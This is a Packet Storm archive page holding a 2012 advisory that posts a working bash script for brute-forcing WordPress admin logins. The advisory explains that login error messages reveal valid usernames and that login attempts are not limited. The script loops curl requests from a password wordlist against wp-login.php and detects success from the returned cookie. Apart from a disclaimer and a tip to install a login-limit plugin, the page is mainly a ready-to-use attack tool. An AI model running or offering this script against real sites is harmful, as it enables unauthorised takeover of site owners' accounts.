exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Bruteforce Script

WordPress Bruteforce Script
Posted Apr 29, 2012
Authored by CorryL

This is a simple bash script for bruteforcing WordPress.

tags | cracker, bash
SHA-256 | a04595fb1fae7483302800dc402320dae1656bd040d010c93927bb2d7e92208a

WordPress Bruteforce Script

Change Mirror Download
-=[--------------------ADVISORY-------------------]=-

WordPress BruteForce Script

Author: Corrado Liotta Aka CorryL [corryl80@gmail.com] #x0n3-h4ck will
never die#
-=[-----------------------------------------------]=-


-=[+] Application: WordPress
-=[+] Version: 3.2-3.3
-=[+] Vendor's URL: Wordpres.org
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: BruteForce
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
-=[+] +Google: https://plus.google.com/u/0/109396477464303670923

...::[ Descriprion ]::..

What I am about to describe is not a new thing, but I wanted to create
this simple script,
to show how easily it is possible to violate famous as a cms wordpress,
unfortunately like most of you know wordpress has some minor problems
related to the security module login,
in practice as you will see in the picture any user can discover a
user actually
exists simply trying to enter any passwords, because if the CMS
recognizes that the user is present
in the database but the password is wrong return this message "the
password for the admin user is not correct ",
so this makes us understand that the admin user exists,
and that you need only enter the correct password. Another small flaw
security of this CMS
is that it has no control on the default login attemps,
this allows a attaker do not want all the attempts that never stopped coming,
a TIP that I give to all those who use this cms is to install a plugin
for login attemps,
we find several directories inside the plugins wordpress.org




...::[ Proof Of Concept ]::..

Image: http://img832.imageshack.us/img832/4481/wordpressbrute.jpg

...::[ Script ]::..

#!/bin/bash
echo "Wordpress Bruteforcing By Corrado Liotta Aka CorryL"
# Questo script è stato creato a scopo illustrativo.
# Non mi ritengo responsabile sull'uso inappropriato.
# La violazione di sistema informatico non autorizzato
# è punibile per legge Art. 615 Ter
# Installa sul tuo blog wordpress un plugin per il login attemp.
echo "Username"; read USER;
echo "Wordlist Password"; read WLIST;
echo "Sito Web"; read WEB;


while read line
do
echo "---> TESTING ${line} per l'utente $USER"
curl --output test.html --cookie-jar c.cookie --data
"log=$USER&pwd=${line}&wp-submit=Collegati&redirect_to=http%3A%2F%2F$WEB%2Fwp-admin%2F&testcookie=1"
"http://$WEB/wp-login.php"
cat c.cookie>COOK
PARSE=$(cat test.html |grep "La password inserita per l'utente")
CHECK=$(cat COOK|grep "#HttpOnly")
if [ "$CHECK" != "" ]; then
echo "--> Utente $USER PASSWORD TROVATA ! --> ${line} "
break
else
echo "--> Utente $USER PASSWORD Non Trovata !"
fi


done < $WLIST



..::[ Disclousure Timeline ]::..

[29/04/2012] - Public Disclousure

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close